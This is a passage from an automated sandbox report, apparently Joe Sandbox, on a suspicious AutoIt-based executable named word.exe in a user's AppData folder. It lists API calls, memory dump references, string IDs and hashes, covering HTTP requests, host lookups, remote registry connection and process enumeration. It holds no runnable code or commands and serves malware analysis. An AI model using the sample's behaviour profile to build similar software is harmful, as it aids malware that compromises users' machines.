                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1291720006-3916222277
                                                                    • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                    • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                    • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                    • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastselect
                                                                    • String ID: HH
                                                                    • API String ID: 215497628-2761332787
                                                                    • Opcode ID: da7197c15941caa1d72c8d7aa8736bceb8ef2a2e0881a59c6a4d5c90f9e296cd
                                                                    • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                    • Opcode Fuzzy Hash: da7197c15941caa1d72c8d7aa8736bceb8ef2a2e0881a59c6a4d5c90f9e296cd
                                                                    • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf__wcsicoll_wcscpy
                                                                    • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                    • API String ID: 1729044348-3708979750
                                                                    • Opcode ID: f6e76c1fe4419b04985189fe32c5c0bbc5bda6c66cc352814db8eabf69199997
                                                                    • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                    • Opcode Fuzzy Hash: f6e76c1fe4419b04985189fe32c5c0bbc5bda6c66cc352814db8eabf69199997
                                                                    • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                    • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                    • String ID: X1
                                                                    • API String ID: 1976402638-2397719451
                                                                    • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                    • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                    • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                    • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0$X1
                                                                    • API String ID: 3866635326-3791290762
                                                                    • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                    • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                    • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                    • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                    APIs
                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                    • MoveFileW.KERNEL32 ref: 0044BC38
                                                                    • _wcscat.LIBCMT ref: 0044BCAA
                                                                    • _wcslen.LIBCMT ref: 0044BCB7
                                                                    • _wcslen.LIBCMT ref: 0044BCCB
                                                                    • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 2326526234-1173974218
                                                                    • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                    • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                    • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                    • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                    APIs
                                                                      • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                    • _wcslen.LIBCMT ref: 004366DD
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                    • GetLastError.KERNEL32 ref: 0043670F
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                    • _wcsrchr.LIBCMT ref: 0043674C
                                                                      • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                    • String ID: \
                                                                    • API String ID: 321622961-2967466578
                                                                    • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                    • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                    • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                    • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                    • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                    • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                    • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                    APIs
                                                                    • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                    • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                    • __wsplitpath.LIBCMT ref: 00436FA0
                                                                    • _wcscat.LIBCMT ref: 00436FB2
                                                                    • __wcsicoll.LIBCMT ref: 00436FC4
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437003
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2903788889-0
                                                                    • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                    • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                    • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                    • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                    APIs
                                                                    • DeleteObject.GDI32(?), ref: 0044157D
                                                                    • GetDC.USER32(00000000), ref: 00441585
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                    • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                    • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                    • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                    • __freefls@4.LIBCMT ref: 00414135
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                    • String ID:
                                                                    • API String ID: 1925773019-0
                                                                    • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                    • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                    • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                    • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                    APIs
                                                                    • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                    • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                    • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                    • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                    • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                    • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                    • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                    • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                    • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                    • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                    • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                    • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                    • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                    • _memset.LIBCMT ref: 00464B92
                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                    • WSACleanup.WSOCK32 ref: 00464CE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 3424476444-0
                                                                    • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                    • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                    • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                    • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_wcslen
                                                                    • String ID:
                                                                    • API String ID: 535477410-0
                                                                    • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                    • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                    • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                    • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00473C01
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID: HH
                                                                    • API String ID: 3488606520-2761332787
                                                                    • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                    • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                    • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                    • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                    APIs
                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
